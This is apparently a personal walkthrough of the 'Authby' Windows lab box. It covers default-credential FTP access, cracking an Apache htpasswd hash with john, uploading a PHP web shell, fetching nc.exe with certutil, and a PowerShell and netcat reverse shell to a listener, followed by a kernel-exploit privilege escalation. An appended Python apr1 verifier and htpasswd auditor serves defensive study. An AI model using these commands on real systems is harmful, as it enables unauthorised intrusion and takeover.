WDavid404 / PG-Box

PG box walkthrough note

Authby (Intermediate, Windows) #45

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago

Keypoints:

WDavid404 commented 1 month ago
PORT     STATE SERVICE            REASON          VERSION
21/tcp   open  ftp                syn-ack ttl 125 zFTPServer 6.0 build 2011-10-17
242/tcp  open  http               syn-ack ttl 125 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
3145/tcp open  zftp-admin         syn-ack ttl 125 zFTPServer admin
3389/tcp open  ssl/ms-wbt-server? syn-ack ttl 125
| rdp-ntlm-info: 
|   Target_Name: LIVDA
|   NetBIOS_Domain_Name: LIVDA
|   NetBIOS_Computer_Name: LIVDA
|   DNS_Domain_Name: LIVDA
|   DNS_Computer_Name: LIVDA
|   Product_Version: 6.0.6001
|_  System_Time: 2024-07-31T04:13:35+00:00
|_ssl-date: 2024-07-31T04:13:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Issuer: commonName=LIVDA

search exploit info for zftp --> zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal

22/tcp: Log in to FTP with anonymous --> [image] Cannot download files due to permissions. List usernames in the /accounts dir [image]

242/tcp: [image] --> Try admin:admin --> Failed... --> Try using the account name info to log in --> Failed

Try logging in to FTP with the account name info (Offsec, Admin) --> Can log in with admin:admin [image] Download all files and confirm the content. cat .htpasswd --> offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0

Crack it:

echo '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

--> elite

Log in to the 242/tcp page with offsec:elite --> [image] --> Translate to English: "He who wants to be a nut from a nut breaks the nut!" [image]

ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.156.46/FUZZ -H "Authorization: Basic b2Zmc2VjOmVsaXRl" --> No info

Try RDP login with offsec:elite --> failed

When logging in to FTP with admin:admin, found that we can upload files to FTP! So, upload a PHP cmd file, because in FTP there is "index.php", which is what we found after logging in to 242/tcp. So for the reverse shell PHP file, we can access it via IP:242/php_cmd.php?cmd=whoami --> works! Use the PowerShell reverse command ....?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.205%27%2C80%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22 --> didn't work.

Try uploading nc.exe and then use a reverse shell via nc.exe: wget 192.168.45.205/nc64.exe -O C:/windows/temp/nc64.exe --> didn't work

certutil -urlcache -f http://192.168.45.205/nc.exe  c:/users/public/downloads/nc.exe
certutil%20-urlcache%20-f%20http://192.168.45.205/nc64.exe%20%20c:/users/public/downloads/nc64.exe
c:/users/public/downloads/nc.exe -e cmd 192.168.45.205 4444

--> works! [image] (Also tried other dir locations but all failed: [image])

PE

systeminfo ---> [image]

Regarding Windows kernel exploits, can use https://github.com/SecWiki/windows-kernel-exploits [image] --> https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120

Put x86.exe on FTP and use it to send an nc reverse shell [image], so we got a reverse shell as the admin user [image]
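Added note, not part of the walkthrough or the PG-Box repository: the .htpasswd hash above fell to a wordlist in seconds because `$apr1$` is md5crypt with the Apache magic string, i.e. MD5 run 1000 times with no memory cost, so a single CPU core tries hundreds of thousands of candidates per second. The Python below reimplements that algorithm from the FreeBSD crypt-md5 description so you can verify the recovered offsec:elite pair yourself and audit an htpasswd file for entries still on fast schemes that should be rehashed with bcrypt (`htpasswd -B`). The function names, the `WEAK_SCHEMES` table and the sample file contents are mine; the sample is built from the single line the note shows.

```python
import hashlib
import hmac

# Constructed sample .htpasswd: the one line recovered in the note above,
# plus a bcrypt-style entry (placeholder value, not a real hash) to show the audit contrast.
SAMPLE_HTPASSWD = """offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
svc:$2y$05$PLACEHOLDERbcryptHashValueNotRealxxxxxxxxxxxxxxxxxxxxxx
"""

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Scheme prefix -> (name, considered weak). htpasswd also emits plain crypt(3)
# and plaintext on some platforms; both are treated as weak below.
WEAK_SCHEMES = {"$apr1$": ("apr1-md5", True), "{SHA}": ("sha1", True),
                "$2y$": ("bcrypt", False), "$2a$": ("bcrypt", False)}


def _to64(value, count):
    """crypt(3)-style base-64: `count` 6-bit groups, least-significant group first."""
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def apr1_crypt(password, salt, magic="$apr1$"):
    """md5crypt with the Apache magic, as written by `htpasswd -m`."""
    pw, sb, mg = password.encode(), salt[:8].encode(), magic.encode()
    ctx = hashlib.md5(pw + mg + sb)
    alt = hashlib.md5(pw + sb + pw).digest()      # MD5(pw, salt, pw)
    pl = len(pw)
    while pl > 0:                                  # feed len(pw) bytes of alt
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    i = len(pw)
    while i:                                       # one byte per bit of len(pw)
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    for i in range(1000):                          # the only "stretching" apr1 has
        c1 = hashlib.md5()
        c1.update(pw if i & 1 else final)
        if i % 3:
            c1.update(sb)
        if i % 7:
            c1.update(pw)
        c1.update(final if i & 1 else pw)
        final = c1.digest()
    groups = ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    encoded = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                      for a, b, c in groups)
    encoded += _to64(final[11], 2)
    return magic + salt[:8] + "$" + encoded


def verify_apr1(password, hashed):
    """True if `password` matches an existing $apr1$ string; constant-time compare."""
    parts = hashed.split("$")
    if len(parts) != 4 or parts[1] != "apr1":
        raise ValueError("not an $apr1$ hash")
    return hmac.compare_digest(apr1_crypt(password, parts[2]), hashed)


def scheme_of(hashed):
    """Name the htpasswd scheme and say whether it is a fast (weak) one."""
    for prefix, info in WEAK_SCHEMES.items():
        if hashed.startswith(prefix):
            return info
    if len(hashed) == 13:                          # traditional DES crypt(3)
        return ("crypt", True)
    return ("plaintext", True)


def audit_htpasswd(text):
    """Return [(user, scheme)] for entries that should be migrated to bcrypt."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        user, _, hashed = line.partition(":")
        name, weak = scheme_of(hashed)
        if weak:
            findings.append((user, name))
    return findings


if __name__ == "__main__":
    print(verify_apr1("elite", "$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0"))
    print(audit_htpasswd(SAMPLE_HTPASSWD))
```

The audit only classifies by prefix; it never tries candidate passwords, which is the point: on a defender's side the fix is rehashing every `apr1`/`sha1`/`crypt` entry, not checking whether the current one happens to be strong.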